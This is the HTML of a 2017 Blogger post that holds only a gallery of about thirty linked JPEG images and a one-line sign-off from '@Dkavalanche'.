<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtTlByg0QXFxhU_OxiGP8sgthyX5sUpTeIqlKNzeKWPm8mOMvqfg9IuaWgO2kSwKJqO4XutOtZMonLrwXr2sbSzsV1QdPMiw8BihhuB2F2zv1caRxbQCr9stD12OIIH6nZggOyLbxaL38/s1600/NQiQt524yEJw.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtTlByg0QXFxhU_OxiGP8sgthyX5sUpTeIqlKNzeKWPm8mOMvqfg9IuaWgO2kSwKJqO4XutOtZMonLrwXr2sbSzsV1QdPMiw8BihhuB2F2zv1caRxbQCr9stD12OIIH6nZggOyLbxaL38/s320/NQiQt524yEJw.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTvJ7-yT-nq0o7iXwOu5Gg4ePJdzT97hqK5rFbNRdzZWjHe2hwV0KLxQ_yvx3FEExW7OuJCNftRjTF2Q-g29Ak9GNQtSWEexFa_UgQBlQRI6xB_jFtnkpAIO32V5nWLyW-8NyPBEPGv-A/s1600/nvHDQ5Zd.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTvJ7-yT-nq0o7iXwOu5Gg4ePJdzT97hqK5rFbNRdzZWjHe2hwV0KLxQ_yvx3FEExW7OuJCNftRjTF2Q-g29Ak9GNQtSWEexFa_UgQBlQRI6xB_jFtnkpAIO32V5nWLyW-8NyPBEPGv-A/s320/nvHDQ5Zd.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOzWepvGCLyDsKUokMTNYqvn1LonW7RkH2jA7Y0Th3tsxgtob-U-bFBD5d1lIGC1D3g7iuVOSQYtWq2JN5iVNvCmC1VKTNQTmLKq1osO3RIdpaVH0pcBQdzY6baRoJ9rPnWNFV3dUFS14/s1600/nvHDQ5Zd.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOzWepvGCLyDsKUokMTNYqvn1LonW7RkH2jA7Y0Th3tsxgtob-U-bFBD5d1lIGC1D3g7iuVOSQYtWq2JN5iVNvCmC1VKTNQTmLKq1osO3RIdpaVH0pcBQdzY6baRoJ9rPnWNFV3dUFS14/s320/nvHDQ5Zd.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPXP4pd5yymmHs_vDY5S-W7tPtiaVzZZRNvqMQljWviVkFER714f2qJ8LPB92MXZ0Zt7OQrhtalF9pliEg0Yau2jJoZWiKvyl1d1tDHKQJW3T-VR7mC2u9EUtKdNSCeLoL0P8UnZFnJuY/s1600/nwEckMNTC.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPXP4pd5yymmHs_vDY5S-W7tPtiaVzZZRNvqMQljWviVkFER714f2qJ8LPB92MXZ0Zt7OQrhtalF9pliEg0Yau2jJoZWiKvyl1d1tDHKQJW3T-VR7mC2u9EUtKdNSCeLoL0P8UnZFnJuY/s320/nwEckMNTC.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_WVrAgQ0bjZTH0hHhrfL24HQ4eprprQ16P6mFp5ZOMZ8SuS9h-qXj5iVAi4OpYB6HRdjwyvhf2SFk9LL6wZEuZVXM_3Lwrmy_BzLqctYPxKkXsZhRh2YnJW0rGrJQsQGddNnILhXkRy4/s1600/nxvtZOMSBWCd5ftW.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_WVrAgQ0bjZTH0hHhrfL24HQ4eprprQ16P6mFp5ZOMZ8SuS9h-qXj5iVAi4OpYB6HRdjwyvhf2SFk9LL6wZEuZVXM_3Lwrmy_BzLqctYPxKkXsZhRh2YnJW0rGrJQsQGddNnILhXkRy4/s320/nxvtZOMSBWCd5ftW.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitTetyxz5jXHdpMPDGWQcQFxhSAweqxPu6hQ4tK4Xm8P3bZRtsd8Ouyq617P8XkPjxo9i6VoPdXVWG3tKPo6lo24Gh2Oko5eN7d9zvd2wfiWC7TKc1PgBdYKPay1htFKkSYX6xpc_ExUE/s1600/ORv4Ucb3VAhz79.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitTetyxz5jXHdpMPDGWQcQFxhSAweqxPu6hQ4tK4Xm8P3bZRtsd8Ouyq617P8XkPjxo9i6VoPdXVWG3tKPo6lo24Gh2Oko5eN7d9zvd2wfiWC7TKc1PgBdYKPay1htFKkSYX6xpc_ExUE/s320/ORv4Ucb3VAhz79.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOswGrtCj2O78C7c_c3eY_v_N0lvDjbu6m70TUJVwxNCCuytg395WrqvCEBXo5v5TmHjADx811Rays5gqjnSfrfyQmEOYo9NuNqCFFLfN_I_G6GsxsZwEnTnM_O8LGVvGB2lQ38YEpFIk/s1600/NQiQt524yEJw.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOswGrtCj2O78C7c_c3eY_v_N0lvDjbu6m70TUJVwxNCCuytg395WrqvCEBXo5v5TmHjADx811Rays5gqjnSfrfyQmEOYo9NuNqCFFLfN_I_G6GsxsZwEnTnM_O8LGVvGB2lQ38YEpFIk/s320/NQiQt524yEJw.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcPmOYmlIkN1KLiris8KjAWqZP78gxI53DB-iXGNw6WYvoc-ctKsKC_cMp-V_KpeoD1eaRyf-T4G0LCzzHTVJ-NTjWZjwIsmWBCofsXENdCSzBC7g5DH0cvG7BRtmxL6xgcNShUHvCX9c/s1600/NQiQt524yEJw7.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcPmOYmlIkN1KLiris8KjAWqZP78gxI53DB-iXGNw6WYvoc-ctKsKC_cMp-V_KpeoD1eaRyf-T4G0LCzzHTVJ-NTjWZjwIsmWBCofsXENdCSzBC7g5DH0cvG7BRtmxL6xgcNShUHvCX9c/s320/NQiQt524yEJw7.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqMf8WC3SQcjzLpBSEFsXdzP620mEyk9iCkhrNKrn9MfhGaBBIv-PvoKqJN5Q5Thqm5qBu9qh4v1moqAZcOs8_jTwkdqsT1NquHDJgqjRE2yPzj2p84ZrnbNMvEd41S-DX1Ijn0Q99tRQ/s1600/NQiQt524yEJw7.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqMf8WC3SQcjzLpBSEFsXdzP620mEyk9iCkhrNKrn9MfhGaBBIv-PvoKqJN5Q5Thqm5qBu9qh4v1moqAZcOs8_jTwkdqsT1NquHDJgqjRE2yPzj2p84ZrnbNMvEd41S-DX1Ijn0Q99tRQ/s320/NQiQt524yEJw7.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJtrzlXyIkHnVQU1IxgzYGONFzw_ZVT_b7eh72i9vMf1aGDkc0Tguj7udJZWrfuH3LgSgzNSVNGakSSFLTQ95MzMhdejVGGVq-9NHQj8GfoiuQctIF4NzyLEqvoclhR2L2hqr1mC3RFYA/s1600/NQiQt524yEJw5.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJtrzlXyIkHnVQU1IxgzYGONFzw_ZVT_b7eh72i9vMf1aGDkc0Tguj7udJZWrfuH3LgSgzNSVNGakSSFLTQ95MzMhdejVGGVq-9NHQj8GfoiuQctIF4NzyLEqvoclhR2L2hqr1mC3RFYA/s320/NQiQt524yEJw5.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJSMtSANLjKbO-5Eo2GnTBne80dGc3fgt7yVy4IvC-PU_3ywZKDGzAIY8uR3dJay_BLhFZNRrNDz6aVNBXXQnDNlpiCF-xkNVYKr3gjfZZrf-fjZK2QCzSOHdNl-3OsyAErsO0Ir8vJXQ/s1600/NQiQt524yEJw5.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJSMtSANLjKbO-5Eo2GnTBne80dGc3fgt7yVy4IvC-PU_3ywZKDGzAIY8uR3dJay_BLhFZNRrNDz6aVNBXXQnDNlpiCF-xkNVYKr3gjfZZrf-fjZK2QCzSOHdNl-3OsyAErsO0Ir8vJXQ/s320/NQiQt524yEJw5.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE9kqd-1LtMXmk7_Pa5Uv0wfYi3YXp_sR5TyXRVCNUhEMiUxkUqeSHsbeING333p95WIJKKF6F1HQYL5YEeVZ-quWR-6GoG_T_7IU6VPcyK3m0MfsoqYTX_tOzWbegW5g5VvZwBPIWKjs/s1600/NQiQt524yEJw1.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE9kqd-1LtMXmk7_Pa5Uv0wfYi3YXp_sR5TyXRVCNUhEMiUxkUqeSHsbeING333p95WIJKKF6F1HQYL5YEeVZ-quWR-6GoG_T_7IU6VPcyK3m0MfsoqYTX_tOzWbegW5g5VvZwBPIWKjs/s320/NQiQt524yEJw1.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn1PNNskSmtQrnff3DQJoNUZpRzxNu_5eYlMkDKkJERnNCfyuDeOXw47jWx4L-ESr4RZT0wWAqJplZVnVPoom-IMrvFm0vrUwiKoOA2Gjc4A2L6Sg3y1V8VsMidOAjqmO5Yrbnchk8eFI/s1600/elDCthSMZ4.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn1PNNskSmtQrnff3DQJoNUZpRzxNu_5eYlMkDKkJERnNCfyuDeOXw47jWx4L-ESr4RZT0wWAqJplZVnVPoom-IMrvFm0vrUwiKoOA2Gjc4A2L6Sg3y1V8VsMidOAjqmO5Yrbnchk8eFI/s320/elDCthSMZ4.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv8r3IZJzuZ-fH1QVEQxWrEKk1nX7o7sH_YddryXzUuwC0fJV9tjDreiuUFz-KbqIxqhouzPfYcNpuDmc2TumEXVP15ABgnGd42hq5j2te9H72zQbhIpLr10f0QZVnl3XeHhptM_oZw1c/s1600/JMqWLvlOFTT3fWM.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv8r3IZJzuZ-fH1QVEQxWrEKk1nX7o7sH_YddryXzUuwC0fJV9tjDreiuUFz-KbqIxqhouzPfYcNpuDmc2TumEXVP15ABgnGd42hq5j2te9H72zQbhIpLr10f0QZVnl3XeHhptM_oZw1c/s320/JMqWLvlOFTT3fWM.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhji4g5jDpaQ1cog6FVFTe3h7Jmw1rUr-soxFVKmRvUJE_mqWKrctAy603NXIaglES1g1B10WvBEEq4aRGNEkGhuVtzx2ykgYcAx_aKfgofF3hFfTPIvhfgjh15zdOUmn_sxkttYojdjWY/s1600/JMqWLvlOFTT3fWM.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhji4g5jDpaQ1cog6FVFTe3h7Jmw1rUr-soxFVKmRvUJE_mqWKrctAy603NXIaglES1g1B10WvBEEq4aRGNEkGhuVtzx2ykgYcAx_aKfgofF3hFfTPIvhfgjh15zdOUmn_sxkttYojdjWY/s320/JMqWLvlOFTT3fWM.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzGBMLWD2yan72FSp57HFUJGQMayAKLq7-bZNA4ru5j1T7JBU1SmmaKqSujK4e19GkjhP-n5zS7hqAtoRXOQgIFI2Im6XR04iNL9lcZBksr0p073qf6OtSP43QjF7dG3lirVJ5EREfxX8/s1600/KOOKzh9Gs6I.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzGBMLWD2yan72FSp57HFUJGQMayAKLq7-bZNA4ru5j1T7JBU1SmmaKqSujK4e19GkjhP-n5zS7hqAtoRXOQgIFI2Im6XR04iNL9lcZBksr0p073qf6OtSP43QjF7dG3lirVJ5EREfxX8/s320/KOOKzh9Gs6I.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilZSPFxuqISNg3CcnJhSUqYZB0hXtRhWSjUyr1fQnZZyC1KZuRhDlOY6x_TQlnx96lNJOQ5t9X3VXShTharFHFbxInR7bgFJj8AYRnbcRApWbFIg7Oa1AAav5OhzJn7bb6woYAlS0jOro/s1600/kr2Hfh0w4pKnvKe.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilZSPFxuqISNg3CcnJhSUqYZB0hXtRhWSjUyr1fQnZZyC1KZuRhDlOY6x_TQlnx96lNJOQ5t9X3VXShTharFHFbxInR7bgFJj8AYRnbcRApWbFIg7Oa1AAav5OhzJn7bb6woYAlS0jOro/s320/kr2Hfh0w4pKnvKe.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSUbHys3f-xa4A7-MvbFUJRVh0Lmnpdm4xodaBPpZdxI3QXyyaQ195XZPRh39HS2PO0f1xhRjxiO7LAk-NZJkA0dIhmKn8vR4zywN6OxaoQCtCQhI2r3lWn_TiTHe6Wogh3yZuAkEqwyA/s1600/NQiQt524yEJw1.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSUbHys3f-xa4A7-MvbFUJRVh0Lmnpdm4xodaBPpZdxI3QXyyaQ195XZPRh39HS2PO0f1xhRjxiO7LAk-NZJkA0dIhmKn8vR4zywN6OxaoQCtCQhI2r3lWn_TiTHe6Wogh3yZuAkEqwyA/s320/NQiQt524yEJw1.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidqEMiiK2V09fLL-TmrMrp36vO5pwcFeTZq5H6adGW5Y8QPRfd32yAaqkh3slwPvvA_mdgjU3alSIBWTisobTBJxEfdpbWO7oI-1DqOyRKKRfX5I_JVXJzONUrLEnyqim5WnPAHGA33tc/s1600/DEBRDwR9.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidqEMiiK2V09fLL-TmrMrp36vO5pwcFeTZq5H6adGW5Y8QPRfd32yAaqkh3slwPvvA_mdgjU3alSIBWTisobTBJxEfdpbWO7oI-1DqOyRKKRfX5I_JVXJzONUrLEnyqim5WnPAHGA33tc/s320/DEBRDwR9.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5w7NexrhfU2dMxsycz6attBEDdMkgNoGw8CCKoftdF7bqpYHmypHTQvpq8uH8E_h0KiBwQr2hZNrUwN7Tnxk73PY76iprXVL5oOP-uLfwjB8fGKzJxD_Gby0U33wnlhZePk9O_dAmTzA/s1600/DEBRDwR7.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5w7NexrhfU2dMxsycz6attBEDdMkgNoGw8CCKoftdF7bqpYHmypHTQvpq8uH8E_h0KiBwQr2hZNrUwN7Tnxk73PY76iprXVL5oOP-uLfwjB8fGKzJxD_Gby0U33wnlhZePk9O_dAmTzA/s320/DEBRDwR7.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBE_zIl2dh5VqNgKu0Fvr-BfWkBLo4MyHEowNg_C1nKeTVRW3dcHdj9xk8D7k-LNnvM-EQINj5m8be4z_wrzQJG4mD_dfw1VSc5pRiLfb2eX-juZLd3kVrlzkYJ33apOpYcFOO8uE2chg/s1600/DEBRDwR5.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBE_zIl2dh5VqNgKu0Fvr-BfWkBLo4MyHEowNg_C1nKeTVRW3dcHdj9xk8D7k-LNnvM-EQINj5m8be4z_wrzQJG4mD_dfw1VSc5pRiLfb2eX-juZLd3kVrlzkYJ33apOpYcFOO8uE2chg/s320/DEBRDwR5.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh30XcW1k6qYYEgT1vyEa3gwZl_blDtkg9eBuEGoSLvGXpNTl9grartb7eu6hyphenhyphen6WxfW1QV-yPdvUl7RHqBSu6YS5wir8nXc8QfN-ntjCRD9WvX-EcPkiBGHyXv-g31qNzqKhIOrDNu4kM4/s1600/DEBRDwR3.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh30XcW1k6qYYEgT1vyEa3gwZl_blDtkg9eBuEGoSLvGXpNTl9grartb7eu6hyphenhyphen6WxfW1QV-yPdvUl7RHqBSu6YS5wir8nXc8QfN-ntjCRD9WvX-EcPkiBGHyXv-g31qNzqKhIOrDNu4kM4/s320/DEBRDwR3.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAdUF6dmEiGB6eHyOGFZ4_M4k75mON2V3nzUsgheepdg9lirIkuGl5GSMLVkc5kvk8u9KOu60ZLV5c2aYaVWsDCo1IYysogJztS2osXwMO8L_zsrIzGu9hr04b2gjbibi70d2-RzVR0ug/s1600/DEBRDwR1.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAdUF6dmEiGB6eHyOGFZ4_M4k75mON2V3nzUsgheepdg9lirIkuGl5GSMLVkc5kvk8u9KOu60ZLV5c2aYaVWsDCo1IYysogJztS2osXwMO8L_zsrIzGu9hr04b2gjbibi70d2-RzVR0ug/s320/DEBRDwR1.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRn2dfFnl6OuwzAJqVJFn7oQkDI3voUbxJsV89oiHMgqojZzmFhMmcJXUEaTc_Bcv2nwfuYTaU7AjuPGTEv9iCv0mqjgXNuwqJLCrokOLE3PXx3VPhAfX3DW0MYpN4Br1Rzu33e2UvVUs/s1600/DEBRDwR1.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRn2dfFnl6OuwzAJqVJFn7oQkDI3voUbxJsV89oiHMgqojZzmFhMmcJXUEaTc_Bcv2nwfuYTaU7AjuPGTEv9iCv0mqjgXNuwqJLCrokOLE3PXx3VPhAfX3DW0MYpN4Br1Rzu33e2UvVUs/s320/DEBRDwR1.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8nAt_h2aCqsPtxair4x6g-95HxV1a10A91_y3xAWyknBnKd9Mr87zy_seMTfngvjninBYfLr8sxpmbE0XQgZKCVh8d7_2WWDYuE63SBrjdHp4duuESyIv6evB6UkXIJuZC4c81jAQSFU/s1600/bjajVkQauMyu.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8nAt_h2aCqsPtxair4x6g-95HxV1a10A91_y3xAWyknBnKd9Mr87zy_seMTfngvjninBYfLr8sxpmbE0XQgZKCVh8d7_2WWDYuE63SBrjdHp4duuESyIv6evB6UkXIJuZC4c81jAQSFU/s320/bjajVkQauMyu.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-J1F4cZ05i6E4WYaSlx1djT8Ekq_GB-HlfgdIo4e2jQiwfQEqcDbAzs1AAUCzb-FcHa0MI3iFePzftlHWaxNYU-fPHGX4D7FSG8XXoJGfZM6KdpLv44x-HS96SyYrC27O3IZR9IsHkuo/s1600/bjajVkQauMyu.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-J1F4cZ05i6E4WYaSlx1djT8Ekq_GB-HlfgdIo4e2jQiwfQEqcDbAzs1AAUCzb-FcHa0MI3iFePzftlHWaxNYU-fPHGX4D7FSG8XXoJGfZM6KdpLv44x-HS96SyYrC27O3IZR9IsHkuo/s320/bjajVkQauMyu.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3BOsekLoipaudZ3Xv9__ib2b27EoO6052hmBH1Qb5EEvQehuUMaOTizz7IIgPC_xsRVKROoc-EEJV1P6HS0_kohj41hyphenhyphenaayffN9Z0cQ3AI1gv4YdxGdBhzxLB1m1HNqVmasnsluVMwsM/s1600/chKbzWbi.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3BOsekLoipaudZ3Xv9__ib2b27EoO6052hmBH1Qb5EEvQehuUMaOTizz7IIgPC_xsRVKROoc-EEJV1P6HS0_kohj41hyphenhyphenaayffN9Z0cQ3AI1gv4YdxGdBhzxLB1m1HNqVmasnsluVMwsM/s320/chKbzWbi.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCYTNfD960pD14YBJQJc0CQMmiOxV7LWT2WyOab7nlzEa2UJvipIOynhlpv0Z5LWgQiR-3WPEY9pE11XtQTK4wXwJXEzrcPe67gsdORor4zy-elhoDUxGCLJSIDgnB3QWmoZsJR_6c_64/s1600/chKbzWbi.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCYTNfD960pD14YBJQJc0CQMmiOxV7LWT2WyOab7nlzEa2UJvipIOynhlpv0Z5LWgQiR-3WPEY9pE11XtQTK4wXwJXEzrcPe67gsdORor4zy-elhoDUxGCLJSIDgnB3QWmoZsJR_6c_64/s320/chKbzWbi.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3EDbq2WwEkmOxakg-2BzEMfPtqqpnWhSFVslNYebNium7OM3DuvbG0dgOHZ4GYOwvGd0P5ha10d9A-jGYp098lZkF9QRCqbT9lMCGb6QAAcy_O5AuyiBgepC2vayonbwD2qISl_UITB0/s1600/ci6S0fsesJQh4qON.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3EDbq2WwEkmOxakg-2BzEMfPtqqpnWhSFVslNYebNium7OM3DuvbG0dgOHZ4GYOwvGd0P5ha10d9A-jGYp098lZkF9QRCqbT9lMCGb6QAAcy_O5AuyiBgepC2vayonbwD2qISl_UITB0/s320/ci6S0fsesJQh4qON.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTEAA_5UEcu6u_IgiQ6KpYmsc085yAkFrkEFuu6VnwZueneom5AtHYC_vOUW4iXiaT-7cgaBMWWueJIxNmqpgKnPRRqRhvcUL0ZYmVsh1v-ZteVa4dp_1j3scabazaVhyd5Y51SR0W-Gs/s1600/ci6S0fsesJQh4qON.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTEAA_5UEcu6u_IgiQ6KpYmsc085yAkFrkEFuu6VnwZueneom5AtHYC_vOUW4iXiaT-7cgaBMWWueJIxNmqpgKnPRRqRhvcUL0ZYmVsh1v-ZteVa4dp_1j3scabazaVhyd5Y51SR0W-Gs/s320/ci6S0fsesJQh4qON.Picture.Data.jpg" width="320" /></a></div>
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<span style="background-color: white; color: #444444; font-family: 'arial', 'helvetica', sans-serif; font-size: 13px;">That's all for now @Dkavalanche 2017</span><br />
